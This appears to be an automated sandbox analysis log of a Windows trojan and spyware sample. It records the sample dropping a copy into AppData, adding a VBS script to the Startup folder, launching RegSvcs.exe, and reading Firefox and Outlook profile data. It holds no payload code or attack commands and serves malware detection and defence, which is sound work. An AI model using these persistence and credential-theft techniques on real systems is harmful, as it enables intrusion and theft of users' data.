                    Source: XoRPyi5s1i.exe, 00000001.00000002.1614611285.0000000002500000.00000004.00001000.00020000.00000000.sdmp, XoRPyi5s1i.exe, 00000001.00000003.1603896323.0000000001890000.00000004.00000020.00020000.00000000.sdmp, XoRPyi5s1i.exe, 00000001.00000003.1603564614.0000000001871000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1618441264.000000000169E000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1618948208.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1745191511.0000000001938000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1745285883.0000000001957000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.1.drBinary or memory string: 5@B.SlN;M
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017CE7A GetLastError,FormatMessageW,1_2_0017CE7A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016AB84 AdjustTokenPrivileges,CloseHandle,1_2_0016AB84
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_0016B134
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0100AB84 AdjustTokenPrivileges,CloseHandle,2_2_0100AB84
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0100B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_0100B134
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0017E1FD
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00176532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,1_2_00176532
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0018C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,1_2_0018C18C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0013406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_0013406B
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeFile created: C:\Users\user\AppData\Local\LityersesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeFile created: C:\Users\user\AppData\Local\Temp\autC337.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: XoRPyi5s1i.exeReversingLabs: Detection: 63%
                    Source: XoRPyi5s1i.exeVirustotal: Detection: 74%
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeFile read: C:\Users\user\Desktop\XoRPyi5s1i.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\XoRPyi5s1i.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: unjuridically.exe, 00000002.00000003.1631675992.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.1632600353.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1755427863.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000006.00000003.1750972654.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0023AF60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_0023AF60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001C05B8 push ss; ret 1_2_001C05B9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014288A push 66001423h; retn 001Ah1_2_001428E1
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00156B05 push ecx; ret 1_2_00156B18
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010605B8 push ss; ret 2_2_010605B9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF6B05 push ecx; ret 2_2_00FF6B18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00ADA4BA push es; iretd 3_2_00ADA4C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069BCAE0 push ss; retf 7_2_069BCDCE
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeFile created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00198111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00198111
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_0014EB42
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01038111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_01038111
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FEEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00FEEB42
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0015123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0015123A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
